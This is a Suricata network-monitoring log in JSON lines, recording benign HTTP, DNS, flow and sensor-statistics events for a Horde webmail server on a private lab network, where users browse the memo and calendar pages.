{"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":21,"tx_id":0}} {"timestamp":"2020-02-29T00:10:38.000235+0000","event_type":"stats","stats":{"uptime":14290,"capture":{"kernel_packets":134438,"kernel_drops":0},"decoder":{"pkts":134448,"bytes":92809310,"invalid":185,"ipv4":132969,"ipv6":8,"ethernet":134448,"raw":0,"null":0,"sll":0,"tcp":127757,"udp":5012,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2288,"failed_udp":110},"tx":{"http":4584,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2367}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":85424,"memcap":0}}} {"timestamp":"2020-02-29T00:10:39.238217+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:39.249184+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43423,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":203,"tx_id":1}} {"timestamp":"2020-02-29T00:10:39.436232+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4741,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.623452+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582}} {"timestamp":"2020-02-29T00:10:41.000721+0000","flow_id":1096924642080953,"event_type":"flow","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9936,"start":"2020-02-29T00:09:06.456889+0000","end":"2020-02-29T00:09:40.905025+0000","age":34,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:43.000564+0000","flow_id":1628697414491026,"event_type":"flow","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:42.416658+0000","end":"2020-02-29T00:05:42.525766+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:43.170662+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2212,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:43.455717+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627}} {"timestamp":"2020-02-29T00:10:44.624419+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":28526,"tx_id":2}} {"timestamp":"2020-02-29T00:10:45.000222+0000","event_type":"stats","stats":{"uptime":14297,"capture":{"kernel_packets":134462,"kernel_drops":0},"decoder":{"pkts":134466,"bytes":92818316,"invalid":185,"ipv4":132985,"ipv6":8,"ethernet":134466,"raw":0,"null":0,"sll":0,"tcp":127769,"udp":5016,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2290,"failed_udp":110},"tx":{"http":4586,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2369}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":96926,"memcap":0}}} {"timestamp":"2020-02-29T00:10:47.986535+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31913,"tx_id":0}} {"timestamp":"2020-02-29T00:10:47.995571+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42796,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:48.617584+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:10:48.895655+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:48.905698+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49899,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.089696+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.100195+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29779,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.242543+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58843,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:52.000233+0000","event_type":"stats","stats":{"uptime":14304,"capture":{"kernel_packets":134540,"kernel_drops":0},"decoder":{"pkts":134548,"bytes":92861724,"invalid":185,"ipv4":133067,"ipv6":8,"ethernet":134548,"raw":0,"null":0,"sll":0,"tcp":127839,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2347,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":123454,"memcap":0}}} {"timestamp":"2020-02-29T00:10:53.000434+0000","flow_id":2021948915723464,"event_type":"flow","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:52.601288+0000","end":"2020-02-29T00:05:52.710276+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:54.387743+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} {"timestamp":"2020-02-29T00:10:54.388545+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34792,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:55.000722+0000","flow_id":1388849276691051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":16,"bytes_toserver":1776,"bytes_toclient":15021,"start":"2020-02-29T00:09:44.631403+0000","end":"2020-02-29T00:09:54.266905+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 